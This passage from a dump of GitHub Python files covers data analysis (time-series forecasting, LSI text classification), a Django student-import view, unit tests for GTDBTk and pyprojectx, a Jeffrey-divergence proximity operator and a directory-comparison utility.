inplace=True)\npreciotungsteno.to_csv('tungsten_daily_price.csv')","repo_name":"DiegoMerello/Final-Project-Ironhack","sub_path":"wrangling.py","file_name":"wrangling.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30732470784","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf=pd.read_csv('perrin-freres-monthly-champagne-.csv')\n\ndf.info()\n\ndf.isnull().sum()\ndf.dropna(inplace=True)\n\n#cleaning up the data\ndf.columns=['Month','Sales']\ndf.set_index('Month', inplace=True)\n\ndf.describe()\n\nplt.plot(df['Sales'].tail(50))\nplt.show()\n\n##Testing for stationarity\n\nfrom statsmodels.tsa.stattools import adfuller\n\ndef adfuller_test(sales):\n    result=adfuller(sales)\n    print( \"p-value \"+str(result[1]))\n\nadfuller_test(df['Sales'])\n\n\ndf['First diff'] = pd.Series.diff(df.Sales,periods=1)\ndf['seasonal diff']= pd.Series.diff(df['First diff'],periods=12)\nplt.plot(df['seasonal diff'])\nplt.show()\n\nadfuller_test(df['seasonal diff'].dropna()) #p-value 0.0002650462849293356, hence we reject the null hypothesis and conclude the time series is stationary\n\n\nfrom statsmodels.graphics.tsaplots import plot_acf,plot_pacf\n\nfig = plt.figure(figsize=(12,8))\nax1 = fig.add_subplot(211)\nfig = plot_acf(df['seasonal diff'].iloc[13:],lags=40,ax=ax1)\nax2 = fig.add_subplot(212)\nfig = plot_pacf(df['seasonal diff'].iloc[13:],lags=40,ax=ax2)\nplt.show()\n\n##From the ACF and PACF graphs: (p=2, d=1, q=1) and seasonal (P=1, D=1, Q=1, s=12)\nimport statsmodels.api as sm\n\nmodel= sm.tsa.statespace.SARIMAX(df.Sales,order=(2,1,1), seasonal_order=(1,1,1,12))\nresults=model.fit()\nresults.summary()\n\npred = results.get_prediction(start=90,end=115,dynamic=False)\n\nax=df.Sales.plot(label='Observed')\npred.predicted_mean.plot(ax=ax,label='Forecast',alpha=.7)\nplt.legend()\nplt.show()\n\n","repo_name":"sanu-shaw/TimeSeriesLearn1","sub_path":"Time_series_analysis_SARIMAX.py","file_name":"Time_series_analysis_SARIMAX.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"31528821074","text":"import pandas as pd\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nfrom apps.school.models import Classroom, Grade, Section\nfrom apps.student.models import Student\n\n\n# Create your views here.\nclass GenerateQrView(TemplateView):\n    template_name = 'student/generate_qr.html'\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n\n        students = Student.objects.all()\n        classrooms = Classroom.objects.all()\n\n        context['students'] = students\n        context['classrooms'] = classrooms\n\n        return context\n\n\ndef import_xlsx(request):\n    if request.method == 'POST':\n        file = request.FILES['archivo_excel']\n        if file.name.endswith('.xlsx'):\n            df = pd.read_excel(file)\n            for index, row in df.iterrows():\n                dni = row['dni']\n                first_name = row['first_name']\n                last_name = row['last_name']\n                grade = row['grade']\n                section = row['section']\n\n                grade_obj = Grade.objects.get(short_name=grade)\n                section_obj = Section.objects.get(short_name=section)\n\n                classroom_obj = Classroom.objects.get(grade=grade_obj, section=section_obj)\n                student_obj = Student(\n                    dni=dni,\n                    first_name=first_name,\n                    last_name=last_name,\n                    classroom=classroom_obj\n                )\n                student_obj.save()\n            return HttpResponse('Datos importados exitosamente.')\n        else:\n            return 
HttpResponse('El archivo debe estar en formato Excel (.xlsx).')\n return render(request, 'student/import_xlsx.html')","repo_name":"YLlampi/school-assistance","sub_path":"apps/student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14108717417","text":"import pandas as pd\nfrom statistics import median\nfrom sys import argv\n\nif __name__ == '__main__':\n input_file = argv[1]\n file_tf_output = argv[2]\n project_tf_output = argv[3]\n raw_data = pd.read_csv(input_file)\n\n raw_dict = {}\n tf_dict = {}\n for row in raw_data.values:\n projectID = row[0]\n file = row[3]\n changes = row[4] + row[5]\n\n try:\n raw_dict[projectID][file].append(changes)\n except KeyError:\n try:\n raw_dict[projectID][file] = [changes]\n tf_dict[projectID][file] = 0\n except KeyError:\n raw_dict[projectID] = {file: [changes]}\n tf_dict[projectID] = {file: 0}\n\n for project in raw_dict.keys():\n for filename in raw_dict[project].keys():\n changelist = raw_dict[project][filename]\n raw_dict[project][filename] = (sum(changelist), sorted(changelist))\n\n truck_factor = 1\n while truck_factor < 100:\n for project in raw_dict.keys():\n for filename in raw_dict[project].keys():\n total_changes, changelist = raw_dict[project][filename]\n if len(changelist) > 0:\n biggest_change = changelist.pop()\n if total_changes == 0:\n changes_left = 0\n else:\n changes_left = sum(changelist) / total_changes\n if changes_left < .5:\n tf_dict[project][filename] = truck_factor\n raw_dict[project][filename] = (total_changes, [])\n truck_factor += 1\n\n proj_tf_dict = {}\n with open(file_tf_output, 'w') as output_file:\n print(\"project,file,factor\", file=output_file)\n for proj, p_dict in tf_dict.items():\n tf_list = []\n for file, tf in p_dict.items():\n tf_list.append(tf)\n print(proj + \",\" + file + \",\" + str(tf), file=output_file)\n proj_tf_dict[proj] = median(tf_list)\n\n with open(project_tf_output, 'w') as output_file:\n print(\"project,factor\", file=output_file)\n for project, tf in proj_tf_dict.items():\n print(project + \",\" + str(tf), file=output_file)\n\n\n","repo_name":"tylernickr/EDS19","sub_path":"04-truck-factor/truck_factor.py","file_name":"truck_factor.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10034728467","text":"###############################################################################\r\n# #\r\n# This program is free software: you can redistribute it and/or modify #\r\n# it under the terms of the GNU General Public License as published by #\r\n# the Free Software Foundation, either version 3 of the License, or #\r\n# (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program. If not, see . 
#\r\n#                                                                             #\r\n###############################################################################\r\n\r\nimport unittest\r\n\r\n\r\nimport gtdbtk\r\nfrom gtdbtk import tools\r\n\r\n\r\nclass TestTools(unittest.TestCase):\r\n\r\n    def test_add_ncbi_prefix(self):\r\n        refname = 'GCF_123.1'\r\n        self.assertEqual(tools.add_ncbi_prefix(refname), 'RS_GCF_123.1')\r\n        refname = 'GCA_456.1'\r\n        self.assertEqual(tools.add_ncbi_prefix(refname), 'GB_GCA_456.1')\r\n\r\n    def test_splitchunks(self):\r\n        test_dict = {'k1': 'v1', 'k2': 'v2',\r\n                     'k3': 'v3', 'k4': 'v4'}\r\n        my_gen = tools.splitchunks(test_dict, 2)\r\n        self.assertEqual(len(next(my_gen)), 2)\r\n\r\n    def test_splitchunks_list(self):\r\n        test_list = [1, 2, 3, 4, 5, 6]\r\n        my_gen = tools.splitchunks_list(test_list, 2)\r\n        self.assertEqual(len(next(my_gen)), 3)\r\n\r\n    def test_generateTempTableName(self):\r\n        self.assertEqual(len(tools.generateTempTableName()), 24)\r\n\r\n    def test_merge_two_dicts(self):\r\n        a = {'k1': 'v1', 'k2': 'v2'}\r\n        b = {'k3': 'v3', 'k4': 'v4'}\r\n        join_dict = tools.merge_two_dicts(a, b)\r\n        self.assertIn('k1', join_dict)\r\n        self.assertIn('k3', join_dict)\r\n        self.assertEqual(len(join_dict), 4)\r\n\r\n    def test_sha256(self):\r\n        file = 'gtdbtk/tests/data/genomes/genome_1.fna'\r\n        self.assertEqual(tools.sha256(\r\n            file), '64a8a537d4d964366d7eecefc7cb806f82db5544')\r\n\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","repo_name":"TJrogers86/GTDBTk","sub_path":"tests/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"28868228158","text":"def dec_to_base_n(x, n):\n    val = []\n    power = 1\n    while power < x:\n        power *= n\n    power //= n\n    while x > 0:\n        digit = x // power\n        val.append(digit)\n        x -= digit * power\n        power //= n\n    return val\n\ndef summation(n):\n    return (n * (n + 1)) // 2\n\nrows = 1000000000\nmod = 7\nval = dec_to_base_n(rows, mod)\npowers = [1 for x in range(len(val))]\nfor i in range(len(powers) - 2, -1, -1):\n    powers[i] = powers[i + 1] * summation(mod)\n\nresult = 0\nmultiplier = 1\nfor i, e in enumerate(val):\n    x = multiplier * powers[i] * summation(e)\n    result += x\n    if e != 0:\n        multiplier *= e + 1\nprint(result)\n","repo_name":"g-d-l/project_euler","sub_path":"done/148.py","file_name":"148.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"41420881750","text":"#!/usr/local/bin/python\n\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"--px\", help=\"This is the pixel size of the tomogram\",type=float)\nparser.add_argument(\"--F\", help=\"The desired frequency to filter the tomogram to.\",type=float)\n\nargs=parser.parse_args()\n\npixsize=args.px\nnyq_freq=float(0.5)\nfreq=args.F\nreso=float(pixsize * freq * nyq_freq**-1)\n\nprint(reso)\n","repo_name":"shahpnmlab/cryoEM-Python","sub_path":"freq2ang.py","file_name":"freq2ang.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"2854168832","text":"from pathlib import Path\n\nimport pytest\n\nfrom pyprojectx.config import Config\n\n\ndef test_no_config():\n    config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test-no-config.toml\"))\n    assert config.get_tool_requirements(\"tool\") == {\"requirements\": [], \"post-install\": None}\n    assert not config.is_tool(\"tool\")\n    assert 
config.get_alias(\"alias\") == []\n\n\ndef test_no_tool_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test-no-tool-config.toml\"))\n assert config.get_alias(\"run\") == [(None, \"run command\")]\n with pytest.raises(\n Warning, match=r\"Invalid alias wrong-tool-alias: 'wrong-tool' is not defined in \\[tool.pyprojectx\\]\"\n ):\n config.get_alias(\"wrong-tool-alias\")\n\n\ndef test_tool_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n\n assert config.is_tool(\"tool-1\")\n assert config.get_tool_requirements(\"tool-1\") == {\"requirements\": [\"req1\", \"req2\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-2\")\n assert config.get_tool_requirements(\"tool-2\") == {\"requirements\": [\"tool2 requirement\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-3\")\n assert config.get_tool_requirements(\"tool-3\") == {\"requirements\": [\"req1\", \"req2\", \"req3\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-4\")\n assert config.get_tool_requirements(\"tool-4\") == {\"requirements\": [\"tool-4-req1\"], \"post-install\": None}\n\n assert config.is_tool(\"tool-5\")\n assert config.get_tool_requirements(\"tool-5\") == {\n \"requirements\": [\"tool-5-req1\", \"tool-5-req2\"],\n \"post-install\": \"tool-5 && pw@alias-1\",\n }\n\n assert not config.is_tool(\"nope\")\n assert config.get_tool_requirements(\"nope\") == {\"requirements\": [], \"post-install\": None}\n\n\ndef test_alias_config():\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n assert config.get_alias(\"alias-1\") == [(\"tool-1\", \"tool-1 arg\")]\n assert config.get_alias(\"alias-2\") == [(\"tool-2\", \"tool-2 arg1 arg2\")]\n assert config.get_alias(\"alias-3\") == [(\"tool-1\", \"command arg\")]\n assert config.get_alias(\"alias-4\") == [(\"tool-2\", \"command --default @arg:x\")]\n assert config.get_alias(\"combined-alias\") == [(None, \"pw@alias-1 && pw@alias-2 pw@shell-command\")]\n assert config.get_alias(\"alias-list\") == [(None, \"pw@alias-1\"), (None, \"pw@alias-2\"), (None, \"pw@shell-command\")]\n assert config.get_alias(\"shell-command\") == [(None, \"ls -al\")]\n assert config.get_alias(\"backward-compatible-tool-ref\") == [(\"tool-1\", \"command arg\")]\n\n\ndef test_os_specific_alias_config(mocker):\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n assert config.get_alias(\"os-specific\") == [(None, \"cmd\")]\n\n mocker.patch(\"sys.platform\", \"my-os\")\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"test.toml\"))\n assert config.get_alias(\"os-specific\") == [(None, \"my-os-cmd\")]\n\n\ndef test_invalid_toml():\n with pytest.raises(Warning, match=r\".+invalid.toml: Illegal character\"):\n Config(Path(__file__).parent.with_name(\"data\").joinpath(\"invalid.toml\"))\n\n\ndef test_unexisting_toml():\n with pytest.raises(Warning, match=r\"No such file or directory\"):\n Config(Path(__file__).parent.with_name(\"data\").joinpath(\"unexisting.toml\"))\n\n\n@pytest.mark.parametrize(\n (\"shorcut\", \"aliases\"),\n [\n (\"aaa-bbb-ccc\", [\"aaa-bbb-ccc\"]),\n (\"aaaBbbDdd\", [\"aaaBbbDdd\"]),\n (\"b123-c123-d123\", [\"b123-c123-d123\"]),\n (\"c123D123\", [\"c123D123\"]),\n (\"d123-E123\", [\"d123-E123\"]),\n (\"aBC\", [\"aaa-bbb-ccc\"]),\n (\"aaBbCc\", [\"aaa-bbb-ccc\"]),\n (\"e\", []),\n (\"aC\", []),\n (\"A\", []),\n (\"E\", [\"E\"]),\n (\"a\", [\"aaa-bbb-ccc\", \"aaaBbbDdd\"]),\n (\"aB\", [\"aaa-bbb-ccc\", 
\"aaaBbbDdd\"]),\n (\"b\", [\"b123-c123-d123\"]),\n (\"bCD\", [\"b123-c123-d123\"]),\n (\"c1D1\", [\"c123D123\"]),\n (\"dE\", [\"d123-E123\"]),\n ],\n)\ndef test_find_aliases(shorcut, aliases):\n config = Config(Path(__file__).parent.with_name(\"data\").joinpath(\"alias-abbreviations.toml\"))\n assert config.find_aliases(shorcut) == aliases\n","repo_name":"pyprojectx/pyprojectx","sub_path":"tests/unit/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"37"} +{"seq_id":"955214599","text":"import pickle\nfrom sklearn.linear_model import LogisticRegression\nfrom gensim import models, matutils\nfrom .base import BaseEstimator\n\n\nclass LsiEstimator(BaseEstimator):\n def __init__(self):\n super().__init__()\n self.hidden_size = 500\n self.lr_solver = 'newton-cg'\n self.lr_max_iter = 10000\n self.lr_multi_class = 'ovr'\n self.lsi_filename = \"/lsi\"\n self.lr_filename = \"/lr.pickle\"\n\n def train(self, options=None):\n if self.adapter is None:\n raise \"please set adapter before training\"\n adapter = self.adapter\n\n lsi = self.__make_lsi(adapter)\n x_train = self.__make_x(lsi, adapter.be_train)\n y_train = self.__make_y(adapter.ot_train)\n x_test = self.__make_x(lsi, adapter.be_test)\n y_test = self.__make_y(adapter.ot_test)\n meta_test = self.__make_meta(adapter.meta_test)\n\n print(\"Train samples: \", len(x_train))\n print(\"Validation samples: \", len(x_test))\n\n lr = LogisticRegression(solver=self.lr_solver,\n max_iter=self.lr_max_iter,\n multi_class=self.lr_multi_class)\n lr.fit(X=x_train, y=y_train)\n self.lsi = lsi\n self.lr = lr\n\n print(\"Train :\", lr.score(X=x_train, y=y_train))\n print(\"Validation :\", lr.score(X=x_test, y=y_test))\n\n print('Validation Acuracy',\n self.calc_accuracy(x_test, y_test, meta_test))\n\n def predict(self):\n be_infer = self.adapter.get_bow_element_vectors()\n x_infer = self.__make_x(self.lsi, be_infer)\n topic_id = self.predict_x(x_infer[0])\n return self.all_topics[topic_id]\n\n # not supported\n def predict_with_prob_vec(self):\n return None\n\n def predict_x(self, x):\n return self.lr.predict([x])[0]\n\n # not supported\n def predict_x_with_prob_vec(self, x):\n return None\n\n def load_model(self, path):\n self.lsi = models.LsiModel.load(path + self.lsi_filename)\n with open(path + self.lr_filename, \"rb\") as f:\n self.lr = pickle.load(f)\n\n def save_model(self, path):\n self.lsi.save(path + self.lsi_filename)\n with open(path + self.lr_filename, \"wb\") as f:\n pickle.dump(self.lr, f)\n\n def __make_lsi(self, adapter):\n raw_corpus = []\n for x in adapter.be_train:\n raw_corpus.extend(matutils.Dense2Corpus(x.T))\n lsi = models.LsiModel(raw_corpus,\n id2word=adapter.dictionary,\n num_topics=self.hidden_size)\n return lsi\n\n def __make_x(self, lsi, vecs):\n corpus = []\n for x in vecs:\n corpus.extend(matutils.Dense2Corpus(x.T))\n x = []\n for vec in lsi[corpus]:\n x.append(self.__sparse_to_dense(vec))\n return x\n\n def __make_y(self, vecs):\n flatten_vecs = []\n for x in vecs:\n flatten_vecs.extend(x)\n return [v.argmax() for v in flatten_vecs]\n\n def __make_meta(self, vecs):\n flatten_vecs = []\n for x in vecs:\n flatten_vecs.extend(x)\n return flatten_vecs\n\n def __sparse_to_dense(self, vec):\n ret = [0 for e in range(self.hidden_size)]\n for v in vec:\n ret[v[0]] = v[1]\n return 
ret\n","repo_name":"toshiya/semantic_selector","sub_path":"projects/semantic_selector/estimator/lsi.py","file_name":"lsi.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"25206524839","text":"\"\"\"\r\nVersion : 1.0 ( 06-22-2022).\r\n\r\nDEPENDENCIES:\r\n -'newton.py' in the folder 'utils'\r\n -'lambert_W.py' in the folder 'utils'\r\n\r\nAuthor : Mbaye Diongue\r\n\r\nCopyright (C) 2022\r\n\r\nThis file is part of the codes provided at http://proximity-operator.net\r\n\r\nBy downloading and/or using any of these files, you implicitly agree to\r\nall the terms of the license CeCill-B (available online).\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom proxop.utils.newton import newton_\r\nfrom proxop.utils.lambert_W import lambert_W\r\n\r\n\r\nclass Jeffrey:\r\n r\"\"\"Compute the proximity operator and the evaluation of gamma*D.\r\n\r\n Where D is the function defined as:\r\n\r\n\r\n / (x-y) * log(x/y) if x > 0 and y > 0\r\n D(x,y) = | 0 if x=y=0\r\n \\ + inf otherwise\r\n\r\n 'gamma' is the scale factor\r\n\r\n When the inputs are arrays, the outputs are computed element-wise\r\n INPUTS\r\n ========\r\n x - scalar or ND array\r\n y - scalar or ND array with the same size as 'x'\r\n gamma - scalar or ND array compatible with the blocks of 'y' [default: gamma=1]\r\n \"\"\"\r\n\r\n def __init__(self, gamma: float or np.ndarray = 1):\r\n if np.any(gamma <= 0):\r\n raise Exception(\"'gamma' must be strictly positive\")\r\n self.gamma = gamma\r\n\r\n def prox(self, x: np.ndarray, y: np.ndarray) -> [np.ndarray, np.ndarray]:\r\n scale = self.gamma\r\n\r\n if np.size(x) != np.size(y):\r\n raise Exception(\"'x' and 'y' must have the same size\")\r\n # scalar-like inputs handling\r\n if np.size(x) <= 1:\r\n x = np.reshape(x, (-1))\r\n if np.size(y) <= 1:\r\n y = np.reshape(y, (-1))\r\n\r\n # 2nd branch\r\n sz = np.shape(x)\r\n prox_p = np.zeros(sz)\r\n prox_q = np.zeros(sz)\r\n\r\n # branch selection\r\n # when the input is too big, we use a taylor approximation of the\r\n # LambertW function to avoid divergence\r\n u1 = 1 - x / scale\r\n u2 = 1 - y / scale\r\n lw_x, lw_y = np.zeros(sz), np.zeros(sz)\r\n # With x ...\r\n mask_u = u1 > 100\r\n lw_x[mask_u] = u1[mask_u] - u1[mask_u] / (1 + u1[mask_u]) * np.log(u1[mask_u])\r\n\r\n # we use the Lambert_W function otherwise\r\n mask_u = np.logical_not(mask_u)\r\n lw_x[mask_u] = lambert_W(np.exp(1 - x / scale))\r\n # With y ...\r\n mask_u = u2 > 100\r\n lw_y[mask_u] = u2[mask_u] - u2[mask_u] / (1 + u2[mask_u]) * np.log(u2[mask_u])\r\n\r\n # we use the Lambert_W function otherwise\r\n mask_u = np.logical_not(mask_u)\r\n lw_y[mask_u] = lambert_W(np.exp(1 - y / scale))\r\n\r\n mask = lw_x * lw_y < 1\r\n gg = scale\r\n if np.size(scale) > 1:\r\n gg = scale[mask]\r\n xx = x[mask]\r\n yy = y[mask]\r\n # newton's method\r\n\r\n def fun_phi(t):\r\n return (\r\n (t + 1) * np.log(t) - 1 / t + t**2 + (xx / gg - 1) * t + 1 - yy / gg\r\n )\r\n\r\n def der_fun_phi(t):\r\n return np.log(t) + 1 / t + 1 / t**2 + 2 * t + xx / gg\r\n\r\n # root finding\r\n eps = 1e-10\r\n low = lw_x + eps\r\n high = 1 / (lw_y + eps)\r\n t = (low + high) / 2\r\n t = newton_(fun_phi, fp=der_fun_phi, x0=t, low=low, high=high)\r\n\r\n # 1st branch\r\n prox_p[mask] = xx + gg * (np.log(t) + t - 1)\r\n prox_q[mask] = yy - gg * (np.log(t) - 1 / t + 1)\r\n\r\n return [prox_p, prox_q]\r\n\r\n def __call__(self, x: np.ndarray, y: np.ndarray) -> float:\r\n if np.size(x) != np.size(y):\r\n raise 
Exception(\"'x' and 'y' must have the same size\")\r\n if (\r\n np.any(x < 0)\r\n or np.any(y < 0)\r\n or np.any((x == 0) * (y != 0))\r\n or np.any((y == 0) * (x != 0))\r\n ):\r\n return np.inf\r\n if np.size(x) <= 1:\r\n x = np.reshape(x, (-1))\r\n y = np.reshape(y, (-1))\r\n mask = y > 0\r\n res = (x[mask] - y[mask]) * np.log(x[mask] / y[mask])\r\n gg = self.gamma\r\n if np.size(gg) > 1:\r\n gg = gg[mask]\r\n return np.sum(gg * res)\r\n\r\n def _check(self, x):\r\n if (np.size(self.gamma) > 1 and np.size(self.gamma) != np.size(x)):\r\n ValueError(\r\n \"'gamma' must be positive scalars or positive ND arrays\" +\r\n \" with the same size as 'x'\"\r\n )","repo_name":"mbayediongue/proxop","sub_path":"src/proxop/multi/Jeffrey.py","file_name":"Jeffrey.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19646329899","text":"import os\nfrom functools import reduce\nfrom pathlib import Path\nfrom datetime import datetime\nimport json\nfrom collections import namedtuple\n\n\ndef get_directory_structure(rootdir):\n \"\"\"\n Creates a nested dictionary that represents the folder structure of rootdir\n \"\"\"\n TOP_LEVEL_NAME = 'root'\n rootdir = Path(rootdir).resolve()\n start = len(str(rootdir))\n res = {\n 'INFO': {\n 'rootdir': str(rootdir),\n 'timestamp': datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"),\n 'time': datetime.timestamp(datetime.now()),\n 'version': 'v1',\n },\n TOP_LEVEL_NAME: {},\n }\n for path, dirs, files in os.walk(rootdir):\n folders = path[start:].split(os.sep)\n folders = [TOP_LEVEL_NAME] + [f for f in folders if f]\n subdir = dict.fromkeys(files)\n parent = reduce(dict.get, folders[:-1], res)\n parent[folders[-1]] = subdir\n return res\n\n_wrap_entry = namedtuple( 'DirEntryWrapper', 'isLeafDir name size mtime' )\ndef _myscantree( rootdir, follow_links=False, reldir='' ):\n visited = set()\n rootdir = os.path.normpath(rootdir)\n try:\n current_scan_count = 0\n with os.scandir(rootdir) as it:\n for entry in it:\n current_scan_count += 1\n if entry.is_dir():\n if not entry.is_symlink() or follow_links:\n absdir = os.path.relpath(entry.path, rootdir)\n if absdir in visited: \n continue \n else: \n visited.add(absdir)\n yield from _myscantree( entry.path, follow_links, os.path.join(reldir,entry.name) )\n else:\n try:\n st = entry.stat()\n size = st.st_size\n mtime = st.st_mtime\n except FileNotFoundError: # strange bug, $RECYCLE.BIN\\\\...\n print('FileNotFoundError', entry.path)\n size = -1\n mtime = 0\n yield _wrap_entry( \n False,\n os.path.join(reldir,entry.name), \n # entry.is_symlink(),\n size,\n mtime,\n )\n if current_scan_count == 0: # fix bug where empty folders are not included\n yield _wrap_entry( \n True,\n reldir, \n # entry.is_symlink(),\n 0,\n 0,\n )\n except PermissionError:\n print('PermissionError', rootdir)\n pass\n # for path, dirs, files in os.walk(rootdir):\n # for name in files:\n # yield _wrap_entry( \n # os.path.join(reldir,name), \n # # entry.is_symlink(),\n # os.stat(os.path.join(path,name)).st_size,\n # os.stat(os.path.join(path,name)).st_mtime,\n # )\n # for name in dirs:\n # yield from _myscantree( os.path.join(path,name), follow_links, os.path.join(reldir,name) )\n\nclass _NestedDict(dict):\n def __missing__(self, key):\n self[key] = _NestedDict()\n return self[key]\n\ndef get_directory_structure_v2(rootdir):\n \"\"\"\n Creates a nested dictionary that represents the folder structure of rootdir\n \"\"\"\n TOP_LEVEL_NAME = 'root'\n rootdir = 
Path(rootdir).resolve()\n res = _NestedDict()\n res[\"INFO\"] = {\n 'rootdir': str(rootdir),\n 'timestamp': datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\"),\n 'time': datetime.timestamp(datetime.now()),\n 'version': 'v2',\n }\n for item in _myscantree(rootdir): # returns individual files or empty directories\n if item.isLeafDir: # directory that is empty needs special treatment\n folders = item.name.split(os.sep)\n folders = [TOP_LEVEL_NAME] + [f for f in folders if f]\n parent = reduce(lambda d, k: d[k], folders[:-1], res) # get the parent folder by recursive dict.get for all folders until leaf\n parent[folders[-1]] = {}\n continue\n mtime = datetime.fromtimestamp(item.mtime).strftime(\"%y/%m/%d %H:%M:%S\")\n folders = item.name.split(os.sep)\n folders = [TOP_LEVEL_NAME] + [f for f in folders if f]\n parent = reduce(lambda d, k: d[k], folders[:-1], res) # get the parent folder by recursive dict.get for all folders until leaf\n parent[folders[-1]] = json.dumps((item.size, mtime))\n return res\n\nclass Node:\n def __init__(self, name, old_path=None, new_path=None, parent=None, compare_settings={}):\n assert old_path is not None or new_path is not None, 'both paths are None'\n self.name = name\n self.parent = parent\n self.children: list[Node] = []\n self.old_path = old_path\n self.old_files, self.old_dirs = self.get_files_and_dirs(old_path) if old_path is not None else (set(), set())\n self.new_path = new_path\n self.new_files, self.new_dirs = self.get_files_and_dirs(new_path) if new_path is not None else (set(), set())\n\n self.full_name = self.name if self.parent is None else self.parent.full_name + '/' + self.name\n self.stats = {\n 'files': {'old_only': float('nan'), 'new_only': float('nan'), 'common': float('nan')},\n 'dirs': {'old_only': float('nan'), 'new_only': float('nan'), 'common': float('nan')}\n }\n self.stats_deep = None\n self.compare_settings = compare_settings\n self._get_stats()\n\n @staticmethod\n def get_files_and_dirs(path):\n files: list[str] = []\n dirs: list[str] = []\n for name, value in path.items():\n if value is None or isinstance(value, str):\n size, mtime = json.loads(value) if value is not None else ('N/A', 'N/A')\n files.append(name + ' | ' + str(size) + ' | ' + str(mtime)) # concat to string to simplify comparison\n else:\n dirs.append(name)\n return set(files), set(dirs)\n\n def get_del_new_common_file_splits(self):\n old_files = [x[::-1].split(' | ', 2)[::-1] for x in self.old_files]\n new_files = [x[::-1].split(' | ', 2)[::-1] for x in self.new_files]\n compare_size, compare_mtime = self.compare_settings.get('size', True), self.compare_settings.get('mtime', True)\n old_files_formatted = [x[0] + (x[1] if compare_size else '') + (x[2] if compare_mtime else '') for x in old_files]\n new_files_formatted = [x[0] + (x[1] if compare_size else '') + (x[2] if compare_mtime else '') for x in new_files]\n old_files_formatted_set = set(old_files_formatted)\n new_files_formatted_set = set(new_files_formatted)\n\n deleted_files = [real for real, formatted in zip(self.old_files, old_files_formatted) if formatted not in new_files_formatted_set]\n new_files = [real for real, formatted in zip(self.new_files, new_files_formatted) if formatted not in old_files_formatted_set]\n # for common we can either use old or new files, only makes a difference if compare_settings ignores size or mtime, we use new files\n common_files = [real for real, formatted in zip(self.new_files, new_files_formatted) if formatted in old_files_formatted_set]\n return deleted_files, new_files, 
common_files\n\n\n def has_exclusive_new_content(self):\n assert self.stats_deep is not None, 'stats_deep is None'\n return self.old_path is None or self.stats_deep['files']['new_only'] > 0 or self.stats_deep['dirs']['new_only'] > 0\n\n def has_exclusive_old_content(self):\n assert self.stats_deep is not None, 'stats_deep is None'\n return self.new_path is None or self.stats_deep['files']['old_only'] > 0 or self.stats_deep['dirs']['old_only'] > 0\n\n def is_same(self):\n if self.new_path is None or self.old_path is None:\n return False\n assert self.stats_deep is not None, 'stats_deep is None'\n # todo make simpler with AND\n return (self.stats_deep['files']['old_only'], self.stats_deep['files']['new_only'], self.stats_deep['dirs']['old_only'], self.stats_deep['dirs']['new_only']) == (0, 0, 0, 0)\n\n def _get_stats(self):\n r = self.get_del_new_common_file_splits()\n self.stats['files']['old_only'] = len(r[0])\n self.stats['files']['new_only'] = len(r[1])\n self.stats['files']['common'] = len(r[2])\n self.stats['dirs']['old_only'] = len(self.old_dirs - self.new_dirs)\n self.stats['dirs']['new_only'] = len(self.new_dirs - self.old_dirs)\n self.stats['dirs']['common'] = len(self.old_dirs & self.new_dirs)\n if self.old_path is None:\n self.stats['files']['old_only'] = float('nan')\n self.stats['dirs']['old_only'] = float('nan')\n self.stats['files']['common'] = float('nan')\n self.stats['dirs']['common'] = float('nan')\n if self.new_path is None:\n self.stats['files']['new_only'] = float('nan')\n self.stats['dirs']['new_only'] = float('nan')\n self.stats['files']['common'] = float('nan')\n self.stats['dirs']['common'] = float('nan')\n\n def _get_stats_deep(self):\n self.stats_deep = {\n 'files': {'old_only': 0, 'new_only': 0, 'common': 0},\n 'dirs': {'old_only': 0, 'new_only': 0, 'common': 0}\n }\n # make sure children stats are up to date\n for child in self.children:\n child._get_stats_deep()\n # sum children stats\n if self.old_path is not None:\n self.stats_deep['files']['old_only'] = self.stats['files']['old_only'] + 